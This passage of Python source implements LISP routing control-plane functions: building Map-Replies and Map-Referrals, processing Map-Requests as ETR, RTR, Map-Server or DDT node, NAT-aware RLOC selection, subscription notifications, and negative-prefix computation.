            if (rloc_entry.priority == 254 and lisp_i_am_rtr):
                rloc_record.rloc_name = "RTR"
            if (probe_rloc == None): probe_rloc = rloc_entry.rloc

        rloc_record.store_rloc_entry(rloc_entry)
        rloc_record.reach_bit = True
        rloc_record.print_record(" ")
        packet += rloc_record.encode()

    #
    # Echo back the telemetry JSON, stamping our output timestamp, in an
    # extra RLOC-record.
    #
    if (json_telemetry != None):
        rloc_record = lisp_rloc_record()
        if (probe_rloc): rloc_record.rloc.copy_address(probe_rloc)
        rloc_record.local_bit = True
        rloc_record.probe_bit = True
        rloc_record.reach_bit = True
        telemetry = lisp_encode_telemetry(json_telemetry,
            eo=str(time.time()))
        rloc_record.json = lisp_json("telemetry", telemetry)
        rloc_record.print_record(" ")
        packet += rloc_record.encode()

    return(packet)

def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
    map_referral = lisp_map_referral()
    map_referral.record_count = 1
    map_referral.nonce = nonce
    packet = map_referral.encode()
    map_referral.print_map_referral()

    eid_record = lisp_eid_record()

    rloc_count = 0
    if (ddt_entry == None):
        eid_record.eid = eid
        eid_record.group = group
    else:
        rloc_count = len(ddt_entry.delegation_set)
        eid_record.eid = ddt_entry.eid
        eid_record.group = ddt_entry.group
        ddt_entry.map_referrals_sent += 1

    eid_record.rloc_count = rloc_count
    eid_record.authoritative = True

    #
    # Pick the referral action from the delegation type when the caller
    # passed LISP_DDT_ACTION_NULL.
    #
    incomplete = False
    if (action == LISP_DDT_ACTION_NULL):
        if (rloc_count == 0):
            action = LISP_DDT_ACTION_NODE_REFERRAL
        else:
            ddt_node = ddt_entry.delegation_set[0]
            if (ddt_node.is_ddt_child()):
                action = LISP_DDT_ACTION_NODE_REFERRAL
            if (ddt_node.is_ms_child()):
                action = LISP_DDT_ACTION_MS_REFERRAL

    #
    # The incomplete bit is set when we are not authoritative, or when a
    # Map-Server refers for a prefix it does not peer on.
    #
    if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
    if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
        incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)

    eid_record.action = action
    eid_record.ddt_incomplete = incomplete
    eid_record.record_ttl = ttl

    packet += eid_record.encode()
    eid_record.print_record(" ", True)

    if (rloc_count == 0): return(packet)

    for ddt_node in ddt_entry.delegation_set:
        rloc_record = lisp_rloc_record()
        rloc_record.rloc = ddt_node.delegate_address
        rloc_record.priority = ddt_node.priority
        rloc_record.weight = ddt_node.weight
        rloc_record.mpriority = 255
        rloc_record.mweight = 0
        rloc_record.reach_bit = True
        packet += rloc_record.encode()
        rloc_record.print_record(" ")

    return(packet)
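
#
# lisp_etr_process_map_request
#
# Process a Map-Request received by an ETR: look up the EID in the local
# database-mappings and return a Map-Reply (or an encapsulated RLOC-probe
# reply) to the requesting ITR.
#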
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
    ttl, etr_in_ts):

    #
    # Look up target EID (and group for multicast) in the local database.
    #
    if (map_request.target_group.is_null()):
        db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
    else:
        db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
        if (db): db = db.lookup_source_cache(map_request.target_eid, False)

    eid_str = map_request.print_prefix()

    if (db == None):
        lprint("Database-mapping entry not found for requested EID {}".format(
            green(eid_str, False)))
        return

    db_eid_str = db.print_eid_tuple()
    lprint("Found database-mapping EID-prefix {} for requested EID {}".format(
        green(db_eid_str, False), green(eid_str, False)))

    #
    # Reply to the first ITR-RLOC; when it is a private address and NAT
    # traversal is on, reply to the outer source address instead.
    #
    itr_rloc = map_request.itr_rlocs[0]
    if (itr_rloc.is_private_address() and lisp_nat_traversal):
        itr_rloc = source

    nonce = map_request.nonce
    echo_nonce = lisp_nonce_echoing
    keys = map_request.keys

    #
    # Timestamp the telemetry data with the ETR input time, if requested.
    #
    json_telemetry = map_request.json_telemetry
    if (json_telemetry != None):
        map_request.json_telemetry = lisp_encode_telemetry(json_telemetry,
            ei=etr_in_ts)

    db.map_replies_sent += 1

    packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
        LISP_NO_ACTION, 1440, map_request, keys, echo_nonce, True, ttl)

    #
    # For RLOC-probes from a known RTR (or with source port 0), data
    # encapsulate the Map-Reply so it traverses any NAT in the path.
    #
    if (map_request.rloc_probe and len(lisp_sockets) == 4):
        public = (itr_rloc.is_private_address() == False)
        addr_str = itr_rloc.print_address_no_iid()
        if ((public and lisp_rtr_list.has_key(addr_str)) or sport == 0):
            lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
            return

    lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
    return
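
#
# lisp_rtr_process_map_request
#
# Process a Map-Request received by an RTR by replying with this RTR's
# own RLOCs at priority 254.
#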
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
    ttl, etr_in_ts):

    #
    # Reply to the first ITR-RLOC, or to the outer source when private.
    #
    itr_rloc = map_request.itr_rlocs[0]
    if (itr_rloc.is_private_address()): itr_rloc = source
    nonce = map_request.nonce

    eid = map_request.target_eid
    group = map_request.target_group

    #
    # Build an RLOC-set from this RTR's own addresses at priority 254.
    #
    rloc_set = []
    for addr in [lisp_myrlocs[0], lisp_myrlocs[1]]:
        if (addr == None): continue
        rloc_entry = lisp_rloc()
        rloc_entry.rloc.copy_address(addr)
        rloc_entry.priority = 254
        rloc_set.append(rloc_entry)

    echo_nonce = lisp_nonce_echoing
    keys = map_request.keys

    #
    # Timestamp the telemetry data with the RTR input time, if requested.
    #
    json_telemetry = map_request.json_telemetry
    if (json_telemetry != None):
        map_request.json_telemetry = lisp_encode_telemetry(json_telemetry,
            ei=etr_in_ts)

    packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
        1440, map_request, keys, echo_nonce, True, ttl)
    lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
    return
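
#
# lisp_get_private_rloc_set
#
# When the requesting and target sites register through the same public
# address (that is, they appear to sit behind the same NAT) or share a
# configured site-id, return the target site's private RLOCs; otherwise
# return the registered RLOC-set unchanged.
#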
def lisp_get_private_rloc_set(target_site_eid, seid, group):
    rloc_set = target_site_eid.registered_rlocs

    source_site_eid = lisp_site_eid_lookup(seid, group, False)
    if (source_site_eid == None): return(rloc_set)

    #
    # Collect the target site's private RLOCs and its first public RLOC.
    #
    target_public = None
    private_set = []
    for rloc_entry in rloc_set:
        if (rloc_entry.is_rtr()): continue
        if (rloc_entry.rloc.is_private_address()):
            new_rloc = copy.deepcopy(rloc_entry)
            private_set.append(new_rloc)
            continue
        target_public = rloc_entry
        break

    if (target_public == None): return(rloc_set)
    target_public = target_public.rloc.print_address_no_iid()

    #
    # Find the source site's first public RLOC.
    #
    source_public = None
    for rloc_entry in source_site_eid.registered_rlocs:
        if (rloc_entry.is_rtr()): continue
        if (rloc_entry.rloc.is_private_address()): continue
        source_public = rloc_entry
        break

    if (source_public == None): return(rloc_set)
    source_public = source_public.rloc.print_address_no_iid()

    #
    # No site-id configured: compare public registration addresses. Equal
    # addresses mean both sites are behind the same NAT.
    #
    site_id = target_site_eid.site_id
    if (site_id == 0):
        if (source_public == target_public):
            lprint("Return private RLOCs for sites behind {}".format(
                target_public))
            return(private_set)
        return(rloc_set)

    #
    # Sites configured with the same site-id also get private RLOCs.
    #
    if (site_id == source_site_eid.site_id):
        lprint("Return private RLOCs for sites in site-id {}".format(site_id))
        return(private_set)
    return(rloc_set)
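
#
# lisp_get_partial_rloc_set
#
# When RTRs are registered for a site, decide which part of the RLOC-set
# the requester gets: an RTR gets the ETR entries, an ITR gets private
# RLOCs plus the RTR entries.
#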
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
    rtr_list = []
    rloc_set = []

    #
    # Determine if the Map-Request source is one of the RTRs (priority
    # 254) in the registered RLOC-set.
    #
    rtr_is_requester = False
    rtrs_registered = False
    for rloc_entry in registered_rloc_set:
        if (rloc_entry.priority != 254): continue
        rtrs_registered |= True
        if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
        rtr_is_requester = True
        break

    #
    # No RTRs registered, return the entire RLOC-set.
    #
    if (rtrs_registered == False): return(registered_rloc_set)

    #
    # Testing knob: suppress private addresses as if the RTR itself were
    # behind a NAT.
    #
    rtr_behind_nat = (os.getenv("LISP_RTR_BEHIND_NAT") != None)

    #
    # Split the registered set into RTR and ETR entries, honoring the
    # "do not use" unicast/multicast priority of 255.
    #
    for rloc_entry in registered_rloc_set:
        if (rtr_behind_nat and rloc_entry.rloc.is_private_address()): continue
        if (multicast == False and rloc_entry.priority == 255): continue
        if (multicast and rloc_entry.mpriority == 255): continue
        if (rloc_entry.priority == 254):
            rtr_list.append(rloc_entry)
        else:
            rloc_set.append(rloc_entry)

    #
    # An RTR is asking: return the ETR entries so it can encapsulate to
    # them directly.
    #
    if (rtr_is_requester): return(rloc_set)

    #
    # An ITR is asking: return any private RLOCs plus the RTR entries.
    #
    rloc_set = []
    for rloc_entry in registered_rloc_set:
        if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
    rloc_set += rtr_list
    return(rloc_set)
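
#
# lisp_store_pubsub_state
#
# Store subscription state for an ITR that set the subscribe-bit in its
# Map-Request, keyed by the EID-prefix being subscribed to.
#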
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
    pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
    pubsub.add(reply_eid)
    return
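
#
# lisp_convert_reply_to_notify
#
# Convert an encoded Map-Reply into a Map-Notify by rewriting the first
# long of the header and inserting zeroed authentication fields.
#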
def lisp_convert_reply_to_notify(packet):
    #
    # Pull the record-count and nonce out of the Map-Reply header.
    #
    first_long = struct.unpack("I", packet[0:4])[0]
    record_count = socket.ntohl(first_long) & 0xff
    nonce = packet[4:12]
    packet = packet[12::]

    #
    # Build a Map-Notify header with the same record-count and nonce, and
    # zeroed key-id, alg-id, and authentication-length fields.
    #
    first_long = (LISP_MAP_NOTIFY << 28) | record_count
    header = struct.pack("I", socket.htonl(first_long))
    auth = struct.pack("I", 0)

    packet = header + nonce + auth + packet
    return(packet)
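
#
# lisp_notify_subscribers
#
# Send a Map-Notify with the supplied EID-record to every subscriber
# stored in lisp_pubsub_cache for this EID-prefix.
#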
def lisp_notify_subscribers(lisp_sockets, eid_record, eid, site):
    eid_str = eid.print_prefix()
    if (lisp_pubsub_cache.has_key(eid_str) == False): return

    for pubsub in lisp_pubsub_cache[eid_str].values():
        itr = pubsub.itr
        port = pubsub.port
        itr_str = red(itr.print_address_no_iid(), False)
        sub_str = bold("subscriber", False)
        xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
        nonce = "0x" + lisp_hex_string(pubsub.nonce)

        lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format(sub_str,
            itr_str, port, xtr_id, green(eid_str, False), nonce))

        lisp_build_map_notify(lisp_sockets, eid_record, [eid_str], 1, itr,
            port, pubsub.nonce, 0, 0, 0, site, False)
        pubsub.map_notify_count += 1
    return
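
#
# lisp_process_pubsub
#
# Handle a Map-Request with the subscribe-bit set: store pubsub state and
# acknowledge the subscription with a Map-Notify built from the Map-Reply.
#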
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
    ttl, xtr_id):

    #
    # Remember the subscription so Map-Notifies go out on future changes.
    #
    lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl, xtr_id)

    eid_str = green(reply_eid.print_prefix(), False)
    itr_str = red(itr_rloc.print_address_no_iid(), False)
    map_notify = bold("Map-Notify", False)
    xtr_id = "0x" + lisp_hex_string(xtr_id)
    lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(
        map_notify, eid_str, itr_str, xtr_id))

    #
    # Acknowledge with a Map-Notify converted from the encoded Map-Reply.
    #
    packet = lisp_convert_reply_to_notify(packet)
    lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
    return
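
#
# lisp_ms_process_map_request
#
# Process a Map-Request received by a Map-Server: verify any signature,
# look up the site, then either proxy-reply, send a negative Map-Reply,
# or ECM-forward the Map-Request to one of the site's registered ETRs.
# Returns [eid, group, ddt-action] to the caller.
#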
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
    mr_sport, ecm_source):

    eid = map_request.target_eid
    group = map_request.target_group
    eid_str = lisp_print_eid_tuple(eid, group)
    itr_rloc = map_request.itr_rlocs[0]
    xtr_id = map_request.xtr_id
    nonce = map_request.nonce
    action = LISP_NO_ACTION
    pubsub = map_request.subscribe_bit

    #
    # For EID-crypto-hash EIDs, verify the Map-Request signature.
    #
    sig_good = True
    is_crypto_eid = (lisp_get_eid_hash(eid) != None)
    if (is_crypto_eid):
        sig = map_request.map_request_signature
        if (sig == None):
            sig_good = False
            lprint(("EID-crypto-hash signature verification {}, " +
                "no signature found").format(bold("failed", False)))
        else:
            sig_eid = map_request.signature_eid
            hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
            if (sig_good):
                sig_good = map_request.verify_map_request_sig(pubkey)
            else:
                lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".format(sig_eid.print_address(), hash_eid.print_address()))

            passfail = bold("passed", False) if sig_good else \
                bold("failed", False)
            lprint("EID-crypto-hash signature verification {}".format(
                passfail))

    if (pubsub and sig_good == False):
        pubsub = False
        lprint("Suppress creating pubsub state due to signature failure")

    #
    # Reply to the ITR-RLOC when its address-family matches the ECM
    # source, otherwise reply to the ECM source (NAT case).
    #
    reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source

    site_eid = lisp_site_eid_lookup(eid, group, False)

    if (site_eid == None or site_eid.is_star_g()):
        not_found = bold("Site not found", False)
        lprint("{} for requested EID {}".format(not_found,
            green(eid_str, False)))

        #
        # Send negative Map-Reply with a 15-minute TTL.
        #
        lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce,
            itr_rloc, mr_sport, 15, xtr_id, pubsub)

        return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])

    site_eid_str = site_eid.print_eid_tuple()
    site_name = site_eid.site.site_name

    #
    # The site can insist on signed Map-Requests.
    #
    if (is_crypto_eid == False and site_eid.require_signature):
        sig = map_request.map_request_signature
        sig_eid = map_request.signature_eid
        if (sig == None or sig_eid.is_null()):
            lprint("Signature required for site {}".format(site_name))
            sig_good = False
        else:
            sig_eid = map_request.signature_eid
            hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
            if (sig_good):
                sig_good = map_request.verify_map_request_sig(pubkey)
            else:
                lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".format(sig_eid.print_address(), hash_eid.print_address()))

            passfail = bold("passed", False) if sig_good else \
                bold("failed", False)
            lprint("Required signature verification {}".format(passfail))

    #
    # Is the site registered?
    #
    if (sig_good and site_eid.registered == False):
        lprint("Site '{}' with EID-prefix {} is not registered for EID {}".format(site_name, green(site_eid_str, False), green(eid_str, False)))

        #
        # When the entry does not accept more-specifics, put its own
        # prefix in the negative Map-Reply.
        #
        if (site_eid.accept_more_specifics == False):
            eid = site_eid.eid
            group = site_eid.group

        #
        # Use a 1-minute TTL unless the site forces one.
        #
        ttl = 1
        if (site_eid.force_ttl != None):
            ttl = site_eid.force_ttl | 0x80000000

        lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce,
            itr_rloc, mr_sport, ttl, xtr_id, pubsub)

        return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])

    #
    # Decide whether to proxy-reply.
    #
    nat_forced = False
    pr_str = ""
    proxy_reply = False
    if (site_eid.force_nat_proxy_reply):
        pr_str = ", nat-forced"
        nat_forced = True
        proxy_reply = True
    elif (site_eid.force_proxy_reply):
        pr_str = ", forced"
        proxy_reply = True
    elif (site_eid.proxy_reply_requested):
        pr_str = ", requested"
        proxy_reply = True
    elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
        pr_str = ", drop-to-pitr"
        action = LISP_DROP_ACTION
    elif (site_eid.proxy_reply_action != ""):
        action = site_eid.proxy_reply_action
        pr_str = ", forced, action {}".format(action)
        action = LISP_DROP_ACTION if (action == "drop") else \
            LISP_NATIVE_FORWARD_ACTION

    #
    # Apply any policy configured for this site.
    #
    policy_drop = False
    policy = None
    if (proxy_reply and lisp_policies.has_key(site_eid.policy)):
        p = lisp_policies[site_eid.policy]
        if (p.match_policy_map_request(map_request, mr_source)): policy = p

        if (policy):
            matched = bold("matched", False)
            lprint("Map-Request {} policy '{}', set-action '{}'".format(
                matched, p.policy_name, p.set_action))
        else:
            matched = bold("no match", False)
            lprint("Map-Request {} for policy '{}', implied drop".format(
                matched, p.policy_name))
            policy_drop = True

    if (pr_str != ""):
        lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}".format(green(eid_str, False), site_name, green(site_eid_str, False),
            pr_str))

        rloc_set = site_eid.registered_rlocs
        ttl = 1440
        if (nat_forced):
            if (site_eid.site_id != 0):
                #
                # Sites behind the same NAT or with the same site-id can
                # see each other's private RLOCs.
                #
                source_eid = map_request.source_eid
                rloc_set = lisp_get_private_rloc_set(site_eid, source_eid,
                    group)
            if (rloc_set == site_eid.registered_rlocs):
                #
                # Otherwise hand out the partial (RTR) set with short TTL.
                #
                multicast = (site_eid.group.is_null() == False)
                new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest,
                    multicast)
                if (new_set != rloc_set):
                    ttl = 15
                    rloc_set = new_set

        #
        # A configured TTL overrides the defaults.
        #
        if (site_eid.force_ttl != None):
            ttl = site_eid.force_ttl | 0x80000000

        #
        # Policy can override the record TTL, force a drop, or supply an
        # RLOC-record for the Map-Reply.
        #
        if (policy):
            if (policy.set_record_ttl):
                ttl = policy.set_record_ttl
                lprint("Policy set-record-ttl to {}".format(ttl))
            if (policy.set_action == "drop"):
                lprint("Policy set-action drop, send negative Map-Reply")
                action = LISP_POLICY_DENIED_ACTION
                rloc_set = []
            else:
                policy_rloc = policy.set_policy_map_reply()
                if (policy_rloc): rloc_set = [policy_rloc]

        if (policy_drop):
            lprint("Implied drop action, send negative Map-Reply")
            action = LISP_POLICY_DENIED_ACTION
            rloc_set = []

        echo_nonce = site_eid.echo_nonce_capable

        #
        # On signature failure, return an auth-failure negative Map-Reply.
        #
        if (sig_good):
            reply_eid = site_eid.eid
            reply_group = site_eid.group
        else:
            reply_eid = eid
            reply_group = group
            action = LISP_AUTH_FAILURE_ACTION
            rloc_set = []

        packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
            nonce, action, ttl, map_request, None, echo_nonce, False)

        if (pubsub):
            lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
                mr_sport, nonce, ttl, xtr_id)
        else:
            lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)

        return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])

    #
    # No proxy-reply: forward the Map-Request to one of the site's ETRs.
    #
    rloc_count = len(site_eid.registered_rlocs)
    if (rloc_count == 0):
        lprint(("Requested EID {} found site '{}' with EID-prefix {} with " +
            "no registered RLOCs").format(green(eid_str, False), site_name,
            green(site_eid_str, False)))
        return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])

    #
    # Hash the source and destination EIDs to pick an ETR.
    #
    hash_source = map_request.target_eid if \
        map_request.source_eid.is_null() else map_request.source_eid

    hashval = map_request.target_eid.hash_address(hash_source)
    hashval %= rloc_count
    etr = site_eid.registered_rlocs[hashval]

    if (etr.rloc.is_null()):
        lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " +
            "EID-prefix {}, no RLOC address").format(green(eid_str, False),
            site_name, green(site_eid_str, False)))
    else:
        lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " +
            "EID-prefix {}").format(green(eid_str, False),
            red(etr.rloc.print_address(), False), site_name,
            green(site_eid_str, False)))

        #
        # ECM-encapsulate the Map-Request to the selected ETR.
        #
        lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
            map_request.target_eid, etr.rloc, to_etr=True)

    return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
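
#
# lisp_ddt_process_map_request
#
# Process a Map-Request received by a DDT node (or a Map-Server acting as
# one) and answer it with a Map-Referral.
#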
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
    eid = map_request.target_eid
    group = map_request.target_group
    eid_str = lisp_print_eid_tuple(eid, group)
    nonce = map_request.nonce
    action = LISP_DDT_ACTION_NULL

    #
    # As a Map-Server, answer from the site cache; as a DDT node, answer
    # from the DDT cache.
    #
    ddt_entry = None
    if (lisp_i_am_ms):
        site_eid = lisp_site_eid_lookup(eid, group, False)
        if (site_eid == None): return

        if (site_eid.registered):
            action = LISP_DDT_ACTION_MS_ACK
            ttl = 1440
        else:
            eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
            action = LISP_DDT_ACTION_MS_NOT_REG
            ttl = 1
    else:
        ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
        if (ddt_entry == None):
            action = LISP_DDT_ACTION_NOT_AUTH
            ttl = 0
            lprint("DDT delegation entry not found for EID {}".format(
                green(eid_str, False)))
        elif (ddt_entry.is_auth_prefix()):
            #
            # Matched an authoritative-prefix with no delegation below it:
            # compute the least-specific prefix covering the hole.
            #
            action = LISP_DDT_ACTION_DELEGATION_HOLE
            ttl = 15
            auth_prefix_str = ddt_entry.print_eid_tuple()
            lprint(("DDT delegation entry not found but auth-prefix {} " +
                "found for EID {}").format(auth_prefix_str,
                green(eid_str, False)))

            if (group.is_null()):
                eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
                    lisp_ddt_cache)
            else:
                group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
                    lisp_ddt_cache)
                eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
                    ddt_entry.source_cache)

            ddt_entry = None
        else:
            auth_prefix_str = ddt_entry.print_eid_tuple()
            lprint("DDT delegation entry {} found for EID {}".format(
                auth_prefix_str, green(eid_str, False)))
            ttl = 1440

    #
    # Build and send the Map-Referral. Use the control port unless the
    # upper 32 bits of the nonce carry the special 0xdfdf0e1d tag.
    #
    packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl,
        nonce)
    nonce_upper = map_request.nonce >> 32
    if (map_request.nonce != 0 and nonce_upper != 0xdfdf0e1d):
        port = LISP_CTRL_PORT
    lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
    return
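
#
# lisp_find_negative_mask_len
#
# Widen neg_prefix's mask-length to the first high-order bit where eid
# and entry_prefix differ, so the negative prefix will not cover the
# cached entry.
#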
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
    diff_bits = eid.hash_address(entry_prefix)
    address_size = eid.addr_length() * 8
    mask_len = 0

    #
    # Find the first (highest-order) bit where the two addresses differ.
    #
    for mask_len in range(address_size):
        bit = 1 << (address_size - mask_len - 1)
        if (diff_bits & bit): break

    if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
    return
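
#
# lisp_neg_prefix_walk
#
# Cache-walk callback used when computing negative prefixes. Only entries
# in the same instance-id and AFI (or, when an auth-prefix is supplied,
# entries more specific than it) widen the negative prefix.
#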
def lisp_neg_prefix_walk(entry, parms):
    eid, auth_prefix, neg_prefix = parms

    if (auth_prefix == None):
        if (entry.eid.instance_id != eid.instance_id):
            return([True, parms])
        if (entry.eid.afi != eid.afi): return([True, parms])
    else:
        if (entry.eid.is_more_specific(auth_prefix) == False):
            return([True, parms])

    lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
    return([True, parms])
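
#
# lisp_ddt_compute_neg_prefix
#
# Compute the least-specific prefix that covers the requested EID but no
# entry in the supplied DDT cache.
#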
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
    #
    # Don't compute negative prefixes for non-binary EIDs such as
    # distinguished-names or geo-prefixes.
    #
    if (eid.is_binary() == False): return(eid)

    neg_prefix = lisp_address(eid.afi, "", 0, 0)
    neg_prefix.copy_address(eid)
    neg_prefix.mask_len = 0

    auth_prefix_str = ddt_entry.print_eid_tuple()
    auth_prefix = ddt_entry.eid

    #
    # Walk the cache, widening the negative prefix so it covers the EID
    # but none of the cached entries.
    #
    eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
        (eid, auth_prefix, neg_prefix))

    #
    # Zero out the host bits of the computed prefix.
    #
    neg_prefix.mask_address(neg_prefix.mask_len)

    lprint(("Least specific prefix computed from ddt-cache for EID {} " +
        "using auth-prefix {} is {}").format(green(eid.print_address(),
        False), auth_prefix_str, neg_prefix.print_prefix()))
    return(neg_prefix)
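
#
# lisp_ms_compute_neg_prefix
#
# Compute the negative EID-prefix (and group-prefix for multicast) a
# Map-Server returns when an EID is covered by an auth-prefix but has no
# registration, along with the referral action to use.
#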
def lisp_ms_compute_neg_prefix(eid, group):
    neg_prefix = lisp_address(eid.afi, "", 0, 0)
    neg_prefix.copy_address(eid)
    neg_prefix.mask_len = 0
    group_prefix = lisp_address(group.afi, "", 0, 0)
    group_prefix.copy_address(group)
    group_prefix.mask_len = 0
    auth_prefix = None

    #
    # Find the covering DDT entry; with no authority configured, return
    # host prefixes with a not-authoritative action.
    #
    if (group.is_null()):
        ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
        if (ddt_entry == None):
            neg_prefix.mask_len = neg_prefix.host_mask_len()
            group_prefix.mask_len = group_prefix.host_mask_len()
            return([neg_prefix, group_prefix, LISP_DDT_ACTION_NOT_AUTH])

        cache = lisp_sites_by_eid
        if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
    else:
        ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
        if (ddt_entry == None):
            neg_prefix.mask_len = neg_prefix.host_mask_len()
            group_prefix.mask_len = group_prefix.host_mask_len()
            return([neg_prefix, group_prefix, LISP_DDT_ACTION_NOT_AUTH])

        if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group

        group, auth_prefix, group_prefix = lisp_sites_by_eid.walk_cache(
            lisp_neg_prefix_walk, (group, auth_prefix, group_prefix))

        group_prefix.mask_address(group_prefix.mask_len)

        lprint(("Least specific prefix computed from site-cache for " +
            "group EID {} using auth-prefix {} is {}").format(
            group.print_address(),
            auth_prefix.print_prefix() if (auth_prefix != None) else
            "'not found'", group_prefix.print_prefix()))

        cache = ddt_entry.source_cache

    #
    # Delegation hole when we are authoritative but have no registration,
    # otherwise not authoritative at all.
    #
    action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
        LISP_DDT_ACTION_NOT_AUTH

    #
    # Walk the cache to compute the least-specific uncovered EID-prefix.
    #
    eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
        (eid, auth_prefix, neg_prefix))

    #
    # Zero out the host bits of the computed prefix.
    #
    neg_prefix.mask_address(neg_prefix.mask_len)

    lprint(("Least specific prefix computed from site-cache for EID {} " +
        "using auth-prefix {} is {}").format(green(eid.print_address(),
        False), auth_prefix.print_prefix() if (auth_prefix != None) else
        "'not found'", neg_prefix.print_prefix()))

    return([neg_prefix, group_prefix, action])
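
#
# lisp_ms_send_map_referral
#
# Build and send a Map-Referral from a Map-Server in response to a DDT
# Map-Request.
#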
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
    action, eid_prefix, group_prefix):

    eid = map_request.target_eid
    group = map_request.target_group
    nonce = map_request.nonce

    if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440

    #
    # Build the Map-Referral header.
    #
    map_referral = lisp_map_referral()
    map_referral.record_count = 1
    map_referral.nonce = nonce
    packet = map_referral.encode()
    map_referral.print_map_referral()

    incomplete = False

    #
    # When the site was not found, compute the least-specific negative
    # prefix that does not cover any registered site.
    #
    if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
        eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
            group)
        ttl = 15

    if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
    if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
    if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
    if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0

    is_ms_peer = False
    ref_count = 0
    ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
    if (ddt_entry != None):
        ref_count = len(ddt_entry.delegation_set)
        is_ms_peer = ddt_entry.is_ms_peer_entry()
        ddt_entry.map_referrals_sent += 1

    #
    # Set the incomplete bit when not authoritative or not an MS peer.
    #
    if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
    if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
        incomplete = (is_ms_peer == False)

    #
    # Encode the EID-record.
    #
    eid_record = lisp_eid_record()
    eid_record.rloc_count = ref_count
    eid_record.authoritative = True
    eid_record.action = action
    eid_record.ddt_incomplete = incomplete
    eid_record.eid = eid_prefix
    eid_record.group = group_prefix
    eid_record.record_ttl = ttl

    packet += eid_record.encode()
    eid_record.print_record(" ", True)

    #
    # Encode an RLOC-record for each node in the delegation-set.
    #
    if (ref_count != 0):
        for ddt_node in ddt_entry.delegation_set:
            rloc_record = lisp_rloc_record()
            rloc_record.rloc = ddt_node.delegate_address
            rloc_record.priority = ddt_node.priority
            rloc_record.weight = ddt_node.weight
            rloc_record.mpriority = 255
            rloc_record.mweight = 0
            rloc_record.reach_bit = True
            packet += rloc_record.encode()
            rloc_record.print_record(" ")

    #
    # Send on the control port unless the Map-Request had a zero nonce.
    #
    if (map_request.nonce != 0): port = LISP_CTRL_PORT
